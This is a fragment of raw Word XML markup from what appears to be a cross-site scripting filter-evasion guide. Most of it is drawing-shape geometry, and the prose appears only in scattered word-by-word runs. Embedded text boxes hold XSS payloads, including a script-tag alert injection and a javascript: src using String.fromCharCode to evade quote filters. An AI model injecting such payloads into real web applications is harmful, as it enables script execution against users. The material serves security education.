      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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assume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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originally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>meant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correct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sloppy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>coding.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make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significantly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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difficult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correctly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>apart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36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tags:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10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107950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2237740" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1380" name="Group 1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7740" cy="116205"/>
                          <a:chOff x="1614" y="170"/>
                          <a:chExt cx="3524" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1381" name="Freeform 1383"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="169"/>
                            <a:ext cx="3524" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5117 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3524"/>
                              <a:gd name="T2" fmla="+- 0 352 170"/>
                              <a:gd name="T3" fmla="*/ 352 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3524"/>
                              <a:gd name="T6" fmla="+- 0 352 170"/>
                              <a:gd name="T7" fmla="*/ 352 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3524"/>
                              <a:gd name="T10" fmla="+- 0 351 170"/>
                              <a:gd name="T11" fmla="*/ 351 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3524"/>
                              <a:gd name="T14" fmla="+- 0 331 170"/>
                              <a:gd name="T15" fmla="*/ 331 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3524"/>
                              <a:gd name="T18" fmla="+- 0 327 170"/>
                              <a:gd name="T19" fmla="*/ 327 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3524"/>
                              <a:gd name="T22" fmla="+- 0 191 170"/>
                              <a:gd name="T23" fmla="*/ 191 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3524"/>
                              <a:gd name="T26" fmla="+- 0 170 170"/>
                              <a:gd name="T27" fmla="*/ 170 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5117 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3524"/>
                              <a:gd name="T30" fmla="+- 0 170 170"/>
                              <a:gd name="T31" fmla="*/ 170 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5138 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3524"/>
                              <a:gd name="T34" fmla="+- 0 191 170"/>
                              <a:gd name="T35" fmla="*/ 191 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5138 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3524"/>
                              <a:gd name="T38" fmla="+- 0 331 170"/>
                              <a:gd name="T39" fmla="*/ 331 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5120 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3524"/>
                              <a:gd name="T42" fmla="+- 0 351 170"/>
                              <a:gd name="T43" fmla="*/ 351 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5117 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3524"/>
                              <a:gd name="T46" fmla="+- 0 352 170"/>
                              <a:gd name="T47" fmla="*/ 35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24" h="183">
                                <a:moveTo>
                                  <a:pt x="350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503" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3506" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="350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2" name="Text Box 1382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9"/>
                            <a:ext cx="352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"""&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"\&gt;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81" o:spid="_x0000_s1056" style="position:absolute;margin-left:80.7pt;margin-top:8.5pt;width:176.2pt;height:9.15pt;z-index:-15723008;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,170" coordsize="352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">
                <v:shape id="Freeform 1383" o:spid="_x0000_s1057" style="position:absolute;left:1614;top:169;width:3524;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="352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VNp8UA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzJCb3VjSqNEVwlCqT1WBa9jdkyC&#10;u7Mhuyaxv75bKPQ2w3vfmzfr7WiN6KnzjWMF81kCgrh0uuFKwen4/rIE4QOyRuOYFDzIw3YzeVpj&#10;rt3AX9QfQiViCPscFdQhtLmUvqzJop+5ljhqV9dZDHHtKqk7HGK4NTJNkkxabDheqLGlXU3l7XC3&#10;sYZpF5fzR2+KS/adcZF+2nR4U+p5OhYrEIHG8G/+o/c6cq/LOfx+E0e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NU2nxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3503,182l21,182r-3,-1l,161r,-4l,21,21,,3503,r21,21l3524,161r-18,20l3503,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3503,352;21,352;18,351;0,331;0,327;0,191;21,170;3503,170;3524,191;3524,331;3506,351;3503,352" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1382" o:spid="_x0000_s1058" type="#_x0000_t202" style="position:absolute;left:1614;top:169;width:352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A4csQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflhF6azZaEI1uRIqFQqE0pocex+yY&#10;LMnOxuxW03/fFQRv83ifs96MthNnGrxxrGCapCCIK6cN1wq+y7fnBQgfkDV2jknBH3nY5I8Pa8y0&#10;u3BB532oRQxhn6GCJoQ+k9JXDVn0ieuJI3d0g8UQ4VBLPeAlhttOztJ0Li0ajg0N9vTaUNXuf62C&#10;7Q8XO3P6PHwVx8KU5TLlj3mr1NNk3K5ABBrDXXxzv+s4/2Uxg+s38QSZ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wOHL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7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"""&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"\&gt;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rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>fromCharCode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4026"/>
          <w:tab w:val="left" w:pos="5282"/>
        </w:tabs>
        <w:spacing w:before="101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34560" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3093085</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1377" name="Group 1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16205"/>
                          <a:chOff x="4871" y="107"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1378" name="Freeform 1380"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4870" y="107"/>
                            <a:ext cx="572" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5421 4871"/>
                              <a:gd name="T1" fmla="*/ T0 w 572"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 4892 4871"/>
                              <a:gd name="T5" fmla="*/ T4 w 572"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 4889 4871"/>
                              <a:gd name="T9" fmla="*/ T8 w 572"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 4871 4871"/>
                              <a:gd name="T13" fmla="*/ T12 w 572"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 4871 4871"/>
                              <a:gd name="T17" fmla="*/ T16 w 572"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 4871 4871"/>
                              <a:gd name="T21" fmla="*/ T20 w 572"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 4892 4871"/>
                              <a:gd name="T25" fmla="*/ T24 w 572"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5421 4871"/>
                              <a:gd name="T29" fmla="*/ T28 w 572"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5442 4871"/>
                              <a:gd name="T33" fmla="*/ T32 w 572"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5442 4871"/>
                              <a:gd name="T37" fmla="*/ T36 w 572"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5424 4871"/>
                              <a:gd name="T41" fmla="*/ T40 w 572"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5421 4871"/>
                              <a:gd name="T45" fmla="*/ T44 w 572"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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2" h="183">
                                <a:moveTo>
                                  <a:pt x="55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50" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="553" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55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" name="Text Box 1379"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4870" y="107"/>
                            <a:ext cx="57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2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eval()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8" o:spid="_x0000_s1059" style="position:absolute;left:0;text-align:left;margin-left:243.55pt;margin-top:5.35pt;width:28.6pt;height:9.15pt;z-index:-17681920;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4871,107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">
                <v:shape id="Freeform 1380" o:spid="_x0000_s1060" style="position:absolute;left:4870;top:107;width:572;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57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3cNMcA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQU/DMAyF70j7D5EncWPpGGJQlk0TYsBuYyCk3bzG&#10;tFUbpyShK/8eH5B2s/We3/u8WA2uVT2FWHs2MJ1koIgLb2suDXy8b67uQMWEbLH1TAZ+KcJqObpY&#10;YG79id+o36dSSQjHHA1UKXW51rGoyGGc+I5YtC8fHCZZQ6ltwJOEu1ZfZ9mtdlizNFTY0WNFRbP/&#10;cQaa51n/Pd8duuP950u4sWWzdZsnYy7Hw/oBVKIhnc3/169W8GdzwZVvZAS9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d3DTHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m550,182r-529,l18,182,,161r,-3l,21,21,,550,r21,21l571,161r-18,21l550,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="550,289;21,289;18,289;0,268;0,265;0,128;21,107;550,107;571,128;571,268;553,289;550,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1379" o:spid="_x0000_s1061" type="#_x0000_t202" style="position:absolute;left:4870;top:107;width:5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HaJMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYTedGMLVlNXEVEoCGJMDz1Os2Oy&#10;mJ1Ns1uN/94VCt7m8T5nvuxsLS7UeuNYwXiUgCAunDZcKvjKt8MpCB+QNdaOScGNPCwX/d4cU+2u&#10;nNHlGEoRQ9inqKAKoUml9EVFFv3INcSRO7nWYoiwLaVu8RrDbS1fk2QiLRqODRU2tK6oOB//rILV&#10;N2cb87v/OWSnzOT5LOHd5KzUy6BbfYAI1IWn+N/9qeP8t/cZPL6JJ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HaJM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2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eval()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35072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3563620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="694690" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1374" name="Group 1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690" cy="116205"/>
                          <a:chOff x="5612" y="107"/>
                          <a:chExt cx="1094" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1375" name="Freeform 1377"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5611" y="107"/>
                            <a:ext cx="1094" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6684 5612"/>
                              <a:gd name="T1" fmla="*/ T0 w 1094"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 5633 5612"/>
                              <a:gd name="T5" fmla="*/ T4 w 1094"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 5630 5612"/>
                              <a:gd name="T9" fmla="*/ T8 w 1094"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 5612 5612"/>
                              <a:gd name="T13" fmla="*/ T12 w 1094"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 5612 5612"/>
                              <a:gd name="T17" fmla="*/ T16 w 1094"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 5612 5612"/>
                              <a:gd name="T21" fmla="*/ T20 w 1094"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 5633 5612"/>
                              <a:gd name="T25" fmla="*/ T24 w 1094"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6684 5612"/>
                              <a:gd name="T29" fmla="*/ T28 w 1094"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6705 5612"/>
                              <a:gd name="T33" fmla="*/ T32 w 1094"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6705 5612"/>
                              <a:gd name="T37" fmla="*/ T36 w 1094"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6687 5612"/>
                              <a:gd name="T41" fmla="*/ T40 w 1094"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6684 5612"/>
                              <a:gd name="T45" fmla="*/ T44 w 1094"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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94" h="183">
                                <a:moveTo>
                                  <a:pt x="1072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072" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1093" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1093" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1075" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107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6" name="Text Box 1376"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5611" y="107"/>
                            <a:ext cx="109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41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fromCharCode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5" o:spid="_x0000_s1062" style="position:absolute;left:0;text-align:left;margin-left:280.6pt;margin-top:5.35pt;width:54.7pt;height:9.15pt;z-index:-17681408;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="5612,107" coordsize="109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">
                <v:shape id="Freeform 1377" o:spid="_x0000_s1063" style="position:absolute;left:5611;top:107;width:1094;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="109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teqMYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UK3upGpTVEV2mVQr0Ua714G7Nj&#10;EszOht1R03/fLRR6m+G9ed+b+bJ3rbpSiI1nA6NhBoq49LbhysD+6+0xBxUF2WLrmQx8U4Tl4v5u&#10;joX1N/6k604qlUI4FmigFukKrWNZk8M49B1x0k4+OJS0hkrbgLcU7lo9zrJn7bDhRKixo1VN5Xl3&#10;cQlylkPM89f1RT6C3/bj6abbHI0ZPPQvM1BCvfyb/67fbao/mT7B7zdpBL3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teqMYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1072,182l21,182r-3,l,161r,-3l,21,21,,1072,r21,21l1093,161r-18,21l1072,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1072,289;21,289;18,289;0,268;0,265;0,128;21,107;1072,107;1093,128;1093,268;1075,289;1072,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1376" o:spid="_x0000_s1064" type="#_x0000_t202" style="position:absolute;left:5611;top:107;width:109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5OVsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZQq96aYWUhtdRaSFQqGYxEOPY3ZM&#10;FrOzMbvV9N93hYK3ebzPWa4H24oL9d44VvA0TUAQV04brhXsy/fJHIQPyBpbx6TglzysV+PREjPt&#10;rpzTpQi1iCHsM1TQhNBlUvqqIYt+6jriyB1dbzFE2NdS93iN4baVsyRJpUXDsaHBjrYNVafixyrY&#10;fHP+Zs5fh11+zE1Zvib8mZ6UenwYNgsQgYZwF/+7P3Sc//ySwu2beIJ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eTlb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41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fromCharCode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If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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quotes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kind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allowed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</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector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need:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3094355" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1371" name="Group 1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94355" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="4873" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1372" name="Freeform 1374"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="252"/>
                            <a:ext cx="4873" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6465 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4873"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4873"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4873"/>
                              <a:gd name="T10" fmla="+- 0 434 252"/>
                              <a:gd name="T11" fmla="*/ 434 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4873"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4873"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4873"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4873"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6465 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4873"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6487 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4873"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6487 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4873"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6469 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4873"/>
                              <a:gd name="T42" fmla="+- 0 434 252"/>
                              <a:gd name="T43" fmla="*/ 434 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6465 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4873"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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873" h="183">
                                <a:moveTo>
                                  <a:pt x="485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851" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4873" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4873" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4855" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485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3" name="Text Box 137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2"/>
                            <a:ext cx="487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2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SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;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2" o:spid="_x0000_s1065" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:243.65pt;height:9.15pt;z-index:-15722496;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="4873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">
                <v:shape id="Freeform 1374" o:spid="_x0000_s1066" style="position:absolute;left:1614;top:252;width:4873;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4873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efGMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin0InWjgi3RVTTU2pPQtPQ8zY5J&#10;2uxs2F2T1F/vCoXe5vE+Z7keTCM6cr62rGAyTkAQF1bXXCr4eN89PIHwAVljY5kU/JKH9er2Zomp&#10;tj2/UZeHUsQQ9ikqqEJoUyl9UZFBP7YtceSO1hkMEbpSaod9DDeNnCbJXBqsOTZU2FJWUfGTn4yC&#10;Q5/tR9m8daPz13O3NZ/b79nLoNT93bBZgAg0hH/xn/tVx/mzxylcv4kn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B58YxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4851,182l21,182r-3,l,161r,-3l,21,21,,4851,r22,21l4873,161r-18,21l4851,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4851,434;21,434;18,434;0,413;0,410;0,273;21,252;4851,252;4873,273;4873,413;4855,434;4851,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
